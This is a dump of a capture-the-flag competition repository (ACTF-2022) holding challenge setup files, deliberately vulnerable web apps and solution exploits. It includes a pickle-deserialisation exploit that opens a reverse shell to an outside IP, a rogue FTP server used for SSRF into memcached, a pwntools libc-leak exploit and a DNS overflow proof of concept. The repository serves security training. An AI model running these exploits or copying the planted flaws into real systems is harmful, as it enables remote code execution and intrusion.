https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/diff.jpg -------------------------------------------------------------------------------- /misc/탕쿠쿠의유혹/wp/ori_twi.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/ori_twi.jpg -------------------------------------------------------------------------------- /pwn/2048/attachments/2048: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/2048 -------------------------------------------------------------------------------- /pwn/2048/attachments/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/ld-2.31.so -------------------------------------------------------------------------------- /pwn/2048/attachments/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/libc-2.31.so -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/AppJailLauncher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/AppJailLauncher.exe -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/EasyVM.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/EasyVM.exe -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/KernelBase.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/KernelBase.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/kernel32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/kernel32.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/ntdll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/ntdll.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/ucrtbase.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/ucrtbase.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/vcruntime140.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/vcruntime140.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/start.ps1: 
-------------------------------------------------------------------------------- 1 | Set-ProcessMitigation -Name EasyVM.exe -Enable DisallowChildProcessCreation 2 | ./AppJailLauncher.exe ./EasyVM.exe /timeout:120 /key:flag.txt /port:9999 3 | -------------------------------------------------------------------------------- /pwn/kkk/attachments/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/attachments/bzImage -------------------------------------------------------------------------------- /pwn/kkk/attachments/rootfs.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/attachments/rootfs.img -------------------------------------------------------------------------------- /pwn/kkk/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo qemu-system-x86_64 \ 4 | -m 1024M \ 5 | -kernel bzImage \ 6 | -initrd rootfs.img \ 7 | -monitor /dev/null \ 8 | -append "root=/dev/ram console=ttyS0 oops=panic panic=1 kpti=1 quiet" \ 9 | -cpu kvm64,+smep,+smap \ 10 | -smp cores=2,threads=2 \ 11 | -nographic -enable-kvm 12 | -------------------------------------------------------------------------------- /pwn/kkk/exploits/libcrc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/exploits/libcrc.so -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/README.md: -------------------------------------------------------------------------------- 1 | # readme 2 | 3 | - run command 4 | 5 | ```python 6 | ./start.sh 7 | ``` 8 | 9 | - test 10 | 11 | ```python 
12 | dig @127.0.0.1 -p 9999 baidu.com 13 | 14 | ; <<>> DiG 9.16.1-Ubuntu <<>> @127.0.0.1 -p 9999 baidu.com 15 | ; (1 server found) 16 | ;; global options: +cmd 17 | ;; Got answer: 18 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 339 19 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 20 | 21 | ;; OPT PSEUDOSECTION: 22 | ; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096 23 | ; COOKIE: cf2958cf5b8f520740e4d5a8625d4a26824b1325aed43d79 (good) 24 | ;; QUESTION SECTION: 25 | ;baidu.com. IN A 26 | 27 | ;; ANSWER SECTION: 28 | baidu.com. 5 IN A 220.181.38.251 29 | baidu.com. 5 IN A 220.181.38.148 30 | 31 | ;; Query time: 31 msec 32 | ;; SERVER: 127.0.0.1#9999(127.0.0.1) 33 | ;; WHEN: Mon Apr 18 19:23:18 CST 2022 34 | ;; MSG SIZE rcvd: 98 35 | ``` -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/dns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/master_of_dns/attachments/dns -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/dns.conf: -------------------------------------------------------------------------------- 1 | port=9999 2 | no-resolv 3 | server = 114.114.114.114 4 | server = 8.8.8.8 5 | listen-address=0.0.0.0 6 | bind-interfaces 7 | no-hosts 8 | no-negcache 9 | address=/test.com/5.5.5.5 10 | -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | while true; 5 | do 6 | port=9999 7 | pid=$(netstat -nlp | grep :$port | awk '{print $7}' | awk -F"/" '{ print $1 }'); 8 | 9 | if [ -n "$pid" ]; then 10 | kill -9 $pid; 11 | fi 12 | timeout -k 1 60 ./dns -C ./dns.conf 2>/dev/null 13 | 14 | sleep 15 
15 | done 16 | -------------------------------------------------------------------------------- /pwn/master_of_dns/exploits/poc.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | import argparse 4 | import random 5 | import string 6 | 7 | # 无需connect服务端,因为发送时候跟上服务端ip和port就行 8 | client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 9 | 10 | def genRandom(num, slen): 11 | unique_strings = [] 12 | while len(unique_strings) < num: 13 | ustring = ''.join(random.choice(string.ascii_lowercase + string.ascii_lowercase + string.digits) for i in range(slen)) 14 | if ustring not in unique_strings: 15 | unique_strings.append(ustring) 16 | return unique_strings 17 | 18 | def dnsquery(ip, port): 19 | query = os.urandom(2) 20 | query += b'\x01\x00' # Flags: query + Truncated + Recursion Desired + Recursion Available 21 | query += b'\x00\x01' # Questions 22 | query += b'\x00\x00' # Answer RRs 23 | query += b'\x00\x00' # Authority RRs 24 | query += b'\x00\x00'# Additional RRs 25 | 26 | # Queries 27 | payload = b'\x3f' * 0x40 28 | for i in range(15): 29 | payload += b'\xc0' 30 | payload += bytes([0xe + i * 2]) 31 | payload += b'\x00' 32 | print(payload) 33 | query += payload # Name 34 | query += b'\x00\x01' # Type: NS 35 | query += b'\x00\x01'# Class: IN 36 | 37 | client.sendto(query, (ip, int(port))) 38 | data, server_addr = client.recvfrom(1024) 39 | print(data) 40 | 41 | def main(): 42 | parser = argparse.ArgumentParser() 43 | parser.add_argument('-ip', help='ip address', required=True) 44 | parser.add_argument('-port', help='port', required=True) 45 | args = parser.parse_args() 46 | 47 | ip = args.ip 48 | port = args.port 49 | dnsquery(ip, port) 50 | 51 | 52 | if __name__ == '__main__': 53 | main() -------------------------------------------------------------------------------- /pwn/mykvm/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM 
ubuntu:16.04 2 | 3 | RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && \ 4 | apt-get update && apt-get -y dist-upgrade && \ 5 | apt-get install -y lib32z1 xinetd gdb vim python git 6 | 7 | RUN useradd -m ctf 8 | 9 | WORKDIR /home/ctf 10 | 11 | RUN cp -R /usr/lib* /home/ctf 12 | 13 | RUN mkdir /home/ctf/dev && \ 14 | mknod /home/ctf/dev/null c 1 3 && \ 15 | mknod /home/ctf/dev/zero c 1 5 && \ 16 | mknod /home/ctf/dev/random c 1 8 && \ 17 | mknod /home/ctf/dev/urandom c 1 9 && \ 18 | chmod 666 /home/ctf/dev/* 19 | 20 | RUN mkdir /home/ctf/bin && \ 21 | cp /bin/sh /home/ctf/bin && \ 22 | cp /bin/ls /home/ctf/bin && \ 23 | cp /bin/cat /home/ctf/bin 24 | 25 | COPY ./ctf.xinetd /etc/xinetd.d/ctf 26 | COPY ./start.sh /start.sh 27 | RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail 28 | 29 | RUN chmod +x /start.sh 30 | 31 | COPY ./bin/ /home/ctf/ 32 | RUN chown -R root:ctf /home/ctf && \ 33 | chmod -R 750 /home/ctf && \ 34 | chmod 740 /home/ctf/flag 35 | 36 | CMD ["/start.sh"] 37 | 38 | EXPOSE 8888 39 | -------------------------------------------------------------------------------- /pwn/mykvm/attachments/bin/mykvm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/mykvm/attachments/bin/mykvm -------------------------------------------------------------------------------- /pwn/mykvm/attachments/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = root 8 | type = UNLISTED 9 | port = 8888 10 | bind = 0.0.0.0 11 | server = /home/ctf/mykvm 12 | banner_fail = /etc/banner_fail 13 | # safety options 14 | per_source = 10 # the maximum instances of this service per source IP address 15 | rlimit_cpu = 20 # the maximum number of CPU seconds that the 
service may use 16 | #rlimit_as = 1024M # the Address Space resource limit for the service 17 | #access_times = 2:00-9:00 12:00-24:00 18 | } 19 | -------------------------------------------------------------------------------- /pwn/mykvm/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | # DO NOT DELETE 5 | /etc/init.d/xinetd start; 6 | sleep infinity; 7 | -------------------------------------------------------------------------------- /pwn/mykvm/exploits/exp.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/mykvm/exploits/exp.bin -------------------------------------------------------------------------------- /pwn/mykvm/exploits/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # context.log_level = 'debug' 3 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 4 | while(1): 5 | # p = process("./mykvm") 6 | p = remote("10.15.196.135", 9999) 7 | 8 | sla = lambda x,y: p.sendlineafter(x,y) 9 | sa = lambda x,y: p.sendafter(x,y) 10 | 11 | 12 | # code = "\xB0\x61\xBA\x17\x02\xEE\xB0\n\xEE\xF4" 13 | with open("./exp.bin", "rb") as f: 14 | code = f.read() 15 | sla("size:", str(len(code))) 16 | # print disasm(code) 17 | 18 | sa("code:", code) 19 | sla("guest name:", "a"*0x28) 20 | sla("guest passwd:", "a"*0x50) 21 | libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x3ea350#0x3c4b78 22 | system_addr = libc_base + 0x44e30 # do_system 23 | log.success("libc_base: "+hex(libc_base)) 24 | log.success("system_addr: "+hex(system_addr)) 25 | if (system_addr >> 0x10) & 0xff == 0x00: 26 | break 27 | 28 | sla("host name:", 'a'*0x2e + p8(system_addr &0xff) + p8((system_addr >> 8) &0xff)) 29 | 30 | p.interactive() 31 | 
-------------------------------------------------------------------------------- /pwn/mykvm/exploits/readme.txt: -------------------------------------------------------------------------------- 1 | nasm exp.asm -o exp.bin 2 | python exp.py 3 | -------------------------------------------------------------------------------- /pwn/treepwn/attachments/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/ld-2.27.so -------------------------------------------------------------------------------- /pwn/treepwn/attachments/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/libc-2.27.so -------------------------------------------------------------------------------- /pwn/treepwn/attachments/treepwn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/treepwn -------------------------------------------------------------------------------- /reverse/FunTiger/attachments/funTiger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/FunTiger/attachments/funTiger -------------------------------------------------------------------------------- /reverse/Inflated/attachments/inflated: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/Inflated/attachments/inflated -------------------------------------------------------------------------------- 
/reverse/Nagi_Knows/exploits/solve.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "nagi.hpp" 3 | 4 | int main() { 5 | std::cout << Nagi::GetFlag() << std::endl; 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /reverse/dropper/attachments/dropper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/dropper/attachments/dropper.exe -------------------------------------------------------------------------------- /reverse/kcov/attachments/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/kcov/attachments/bzImage -------------------------------------------------------------------------------- /reverse/kcov/attachments/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | qemu-system-x86_64 \ 4 | -smp 2 \ 5 | -kernel ./bzImage \ 6 | -initrd ./rootfs.cpio.gz \ 7 | -nographic \ 8 | -append "console=ttyS0 quiet oops=panic panic=1 nokaslr" \ 9 | -monitor /dev/null \ 10 | -no-reboot \ 11 | -------------------------------------------------------------------------------- /reverse/kcov/attachments/rootfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/kcov/attachments/rootfs.cpio.gz -------------------------------------------------------------------------------- /web/ToLeSion/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10023:5000" 
8 | restart: on-failure
9 |
--------------------------------------------------------------------------------
/web/ToLeSion/attachments/src/app.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -
3 | from flask import Flask, request, redirect
4 | from flask_session import Session
5 | from io import BytesIO
6 | import memcache
7 | import pycurl
8 | import random
9 | import string
10 |
11 | app = Flask(__name__)
12 | app.debug = True  # debug flag is set here; app.run() at the bottom passes debug=False
13 | app.secret_key = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(56))  # key is drawn from the non-cryptographic random module and regenerated at every start; the secrets module is the CSPRNG choice for key material
14 |
15 | app.config['SESSION_TYPE'] = 'memcached'  # session data is kept server-side in memcached
16 | app.config['SESSION_PERMANENT'] = True
17 | app.config['SESSION_USE_SIGNER'] = False  # the session id cookie is not signed, so the client chooses which memcached key is loaded
18 | app.config['SESSION_KEY_PREFIX'] = 'actfSession:'
19 | app.config['SESSION_MEMCACHED'] = memcache.Client(['127.0.0.1:11200'])  # NOTE(review): flask_session 0.4.0 (pinned in requirements.txt) deserialises stored sessions with pickle, so write access to this memcached port has to be treated as code execution in the app
20 |
21 | Session(app)
22 |
23 | @app.route('/')
24 | def index():  # fetches the URL given in ?url= from the server side and returns the response body; without ?url= it redirects to a default URL
25 |     buffer=BytesIO()
26 |     if request.args.get('url'):
27 |         url = request.args.get('url')  # caller-controlled and passed to libcurl unchanged: no host, port or address-range check is done in this function
28 |         c = pycurl.Curl()
29 |         c.setopt(c.URL, url)
30 |         c.setopt(c.FTP_SKIP_PASV_IP, 0)  # 0 = libcurl connects to the IP address the FTP server names in its PASV reply; 1 would ignore that address and reuse the control connection's
31 |         c.setopt(c.WRITEDATA, buffer)
32 |         blacklist = [c.PROTO_DICT, c.PROTO_FILE, c.PROTO_FTP, c.PROTO_GOPHER, c.PROTO_HTTPS, c.PROTO_IMAP, c.PROTO_IMAPS, c.PROTO_LDAP, c.PROTO_LDAPS, c.PROTO_POP3, c.PROTO_POP3S, c.PROTO_RTMP, c.PROTO_RTSP, c.PROTO_SCP, c.PROTO_SFTP, c.PROTO_SMB, c.PROTO_SMBS, c.PROTO_SMTP, c.PROTO_SMTPS, c.PROTO_TELNET, c.PROTO_TFTP]  # deny-list: every protocol not named here stays enabled (PROTO_HTTP and PROTO_FTPS are not in the list)
33 |         allowProtos = c.PROTO_ALL
34 |         for proto in blacklist:
35 |             allowProtos = allowProtos&~(proto)  # clear each denied protocol bit from PROTO_ALL
36 |         c.setopt(c.PROTOCOLS, allowProtos)  # NOTE(review): an allow-list of the schemes actually needed fails closed when libcurl gains protocols; REDIR_PROTOCOLS is not set in this function
37 |         c.perform()
38 |         c.close()
39 |         return buffer.getvalue().decode('utf-8')  # raises UnicodeDecodeError when the fetched body is not valid UTF-8
40 |     else:
41 |         return redirect('?url=http://www.baidu.com',code=301)
42 |
43 | if __name__ == '__main__':
44 |     app.run(host='0.0.0.0', debug=False)  # listens on all interfaces
--------------------------------------------------------------------------------
/web/ToLeSion/attachments/src/dockerfile:
-------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN sed -i 's/security.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list 4 | RUN sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list 5 | COPY ./app.py /app.py 6 | COPY ./requirements.txt /requirements.txt 7 | COPY ./flag /flag 8 | COPY ./readflag /readflag 9 | COPY ./start.sh /start.sh 10 | RUN chmod 777 /start.sh 11 | RUN mkdir -p /data/logs 12 | RUN chmod 600 /flag && \ 13 | chmod +s /readflag && \ 14 | apt-get update && \ 15 | apt-get install memcached telnet && \ 16 | adduser flask 17 | USER flask 18 | RUN pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 19 | EXPOSE 5000 20 | ENTRYPOINT ["/bin/bash", "/start.sh" ] -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/flag: -------------------------------------------------------------------------------- 1 | AAA{test_flag} -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/ToLeSion/attachments/src/readflag -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/requirements.txt: -------------------------------------------------------------------------------- 1 | redis==4.1.4 2 | flask==2.0.3 3 | flask_session==0.4.0 4 | python-memcached==1.59 5 | pycurl==7.45.1 6 | -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/start.sh: -------------------------------------------------------------------------------- 1 | memcached -d -m 50 -p 11200 -u root 2 | python3 ./app.py 3 | tail -f /dev/null 
-------------------------------------------------------------------------------- /web/ToLeSion/exploits/FTPServer.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | 4 | ''' 5 | Usage: python3 exp.py local_port target_ip target_port 6 | target/debug/custom-tls --port 8888 --verbose --certs /root/work/tls-poison/fullchain.crt --key /root/work/tls-poison/private.pem forward 6666 7 | python3 FTPServer.py 6666 127.0.0.1 11200 8 | ''' 9 | 10 | lport = int(sys.argv[1]) 11 | raddr = sys.argv[2].replace('.', ',') 12 | rport = sys.argv[3] 13 | rport = int(rport) 14 | server = socket.socket() 15 | server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 16 | server.bind(('0.0.0.0', lport)) 17 | server.listen() 18 | client, _ = server.accept() 19 | 20 | client.send(b'220 (vsFTPd 3.0.3)\n') 21 | print(client.recv(1024)) 22 | client.send(b'230 Login successful.\n') 23 | print(client.recv(1024)) 24 | client.send(b'220 ok\n') 25 | print(client.recv(1024)) 26 | client.send(b'220 ok\n') 27 | print(client.recv(1024)) 28 | client.send(b'257 "/" is the current directory\n') 29 | print(client.recv(1024)) 30 | client.send(f'227 Entering Passive Mode ({raddr},{rport//256},{rport%256})\n'.encode()) # 默认 php 会使用 EPSV 命令, 这个只能指定端口, 所以我们需要发送两次 227 让 php fallback 到 PASV 模式 31 | print(client.recv(1024)) 32 | client.send(f'227 Entering Passive Mode ({raddr},{rport//256},{rport%256})\n'.encode()) 33 | print(client.recv(1024)) 34 | client.send(b'200 Switching to Binary mode.\n') 35 | print(client.recv(1024)) 36 | client.send(b'125 data connection already open. 
Transfer starting.\n') 37 | print(client.recv(1024)) 38 | client.send(b'250 Requested file action okay, completed.\n') 39 | print(client.recv(1024)) -------------------------------------------------------------------------------- /web/ToLeSion/exploits/exp.py: -------------------------------------------------------------------------------- 1 | import redis 2 | import pickle,requests 3 | 4 | def get_pickle_payload(cmd): 5 | class AAA(): 6 | def __reduce__(self): 7 | return (__import__('os').system, (cmd,)) 8 | aaa = AAA() 9 | payload = pickle.dumps(aaa) 10 | return payload 11 | 12 | def parse(x): 13 | return b'\r\n' + x + b'\r\n' 14 | 15 | def set(key, value): 16 | return parse(b'set %s 0 0 %d\n%s' % (key.encode(), len(value), value)) 17 | 18 | def rce(): 19 | r = requests.get( 20 | url = 'http://localhost:10023/?url=ftps://ctf.zjusec.top:8888/' 21 | ) 22 | print(r.text) 23 | 24 | r = requests.get( 25 | url = 'http://localhost:10023/?url=file:///etc/passwd', 26 | headers={ 27 | 'Cookie':'session=aaa' 28 | } 29 | ) 30 | print(r.text) 31 | def local_set(): 32 | payload = get_pickle_payload('/bin/bash -c "bash -i >& /dev/tcp/150.158.58.29/7777 0>&1"') 33 | r = redis.StrictRedis(host='localhost', port=6379, db=0) 34 | redis_payload = set('actfSession:aaa', payload) 35 | print(redis_payload) 36 | r.set('payload', redis_payload) 37 | # mc = memcache.Client(['127.0.0.1:11200']) 38 | # print(mc.set('actfSession:aaa', payload)) 39 | 40 | if __name__ == "__main__": 41 | # local_set() 42 | rce() -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | init: true 7 | ports: 8 | - "10022:8000" 9 | restart: on-failure 10 | deploy: 11 | resources: 12 | limits: 13 | cpus: '0.50' 14 | memory: 4096M 15 | mongodb: 16 | build: ./mongodb/ 17 | tty: true 
18 | restart: on-failure 19 | deploy: 20 | resources: 21 | limits: 22 | cpus: '0.20' 23 | memory: 1024M -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/mongodb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mongo:latest 2 | 3 | COPY start.sh / 4 | RUN chmod 777 /start.sh 5 | ENV password=fakepassword 6 | EXPOSE 27017 7 | ENTRYPOINT ["bash", "/start.sh" ] -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/mongodb/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | nohup mongod --bind_ip_all > /var/log/mongo.txt & 3 | sleep 2 4 | watch -n 1800 "mongo ctf --eval \"db.users.remove({});db.users.insertOne({username:'admin','password':'$password','isAdmin':true})\"" &>/dev/null & 5 | tail -f /dev/null -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | # COPY linux_signing_key.pub /tmp 3 | COPY ./app /app 4 | RUN sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list 5 | RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list 6 | RUN apt-get update && apt-get install chromium -y 7 | RUN export PUPPETEER_SKIP_DOWNLOAD='true' 8 | WORKDIR /app 9 | RUN npm config set loglevel=http 10 | RUN npm config set registry https://registry.npm.taobao.org 11 | RUN npm install 12 | ENV password=fakepassword 13 | EXPOSE 8000 14 | RUN adduser actfer 15 | USER actfer 16 | ENTRYPOINT ["node","/app/app.js"] 17 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/admin.js: -------------------------------------------------------------------------------- 1 | const 
puppeteer = require('puppeteer');
2 | const process = require('process')
3 | const ADMIN_USERNAME = 'admin'
4 | const ADMIN_PASSWORD = process.env.password // admin password is read from the "password" environment variable
5 | const FLAG = require('./config').FLAG
6 | const view = async(url) => { // logs in as admin in a headless browser, then loads `url` twice (the second time with JavaScript disabled); `url` goes to page.goto unchanged, no scheme or host check is done in this function
7 |     const browser = await puppeteer.launch({
8 |         headless: true,
9 |         args: ['--no-sandbox', '--disable-setuid-sandbox'] // Chromium sandbox is switched off; NOTE(review): the browser then opens a caller-supplied url while logged in as admin, so containment depends on whatever isolation the host or container provides
10 |     })
11 |     const page = await browser.newPage()
12 |     // page.on('console', msg => console.log(msg.text()))
13 |     await page.goto('http://localhost:8000/login')
14 |     await page.type("#username", ADMIN_USERNAME)
15 |     await page.type("#password", ADMIN_PASSWORD)
16 |     await page.click('#btn-login')
17 |     // get flag1
18 |     await page.goto(url, { timeout: 5000 }) // first visit: admin session active, JavaScript enabled
19 |     // get flag2
20 |     await page.setJavaScriptEnabled(false)
21 |     await page.goto(url, { timeout: 5000 }) // second visit: page scripts are disabled
22 |     const data = await page.evaluate((url, FLAG) => { // callback runs in the context of the loaded page; the result is stored in `data` but never read
23 |         if (fff.lll.aaa.ggg.value == "this_is_what_i_want") { // fff is not declared in this file: it resolves against the visited page's globals; the comparison uses loose ==
24 |             return fetch(url + '?part2=' + btoa(encodeURIComponent(FLAG.substring(16)))); // sends FLAG from index 16 onward, URI-encoded then base64-encoded, as a query parameter to `url`
25 |         } else {
26 |             return fetch(url + '?there_is_no_flag')
27 |         }
28 |     }, url, FLAG)
29 |     await browser.close() // NOTE(review): not in a finally block, so a throw from goto or evaluate (for example the 5000 ms timeout) skips this call and leaves the browser process running
30 | }
31 | exports.view = view
--------------------------------------------------------------------------------
/web/beWhatYouWannaBe/attachments/src/app/config.js:
--------------------------------------------------------------------------------
1 | const FLAG = "ACTF{*****************************}" // masked placeholder in the published attachment
2 | const FAKE_FLAG = "only_admin_users_can_see_the_true_flag"
3 | exports.FLAG = FLAG
4 | exports.FAKE_FLAG = FAKE_FLAG
--------------------------------------------------------------------------------
/web/beWhatYouWannaBe/attachments/src/app/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "dependencies": {
3 |     "ejs": "^3.1.8",
4 |     "express": "^4.18.1",
5 |     "express-session": "^1.17.3",
6 |     "mongoose": "^6.3.6",
7 |     "puppeteer": "^14.3.0",
8 |     "puppeteer-core": "^14.3.0",
9 |     "string-random": "^0.1.3"
10 |
} 11 | } -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/views/login.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | login 5 | 6 | 7 | 8 |
9 |
10 |

11 | 12 |

13 |

14 | 15 |

16 |

17 | 18 |

19 |
20 |
21 | <% if(locals.error) { %> 22 |

<%= error %>

23 | <% } %> 24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | login 5 | 6 | 7 | 8 |
9 |
10 |

11 | 12 |

13 |

14 | 15 |

16 |

17 | 18 |

19 |
20 |
21 | <% if(locals.error) { %> 22 |

<%= error %>

23 | <% } %> 24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/exploits/exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | csrf 5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 |
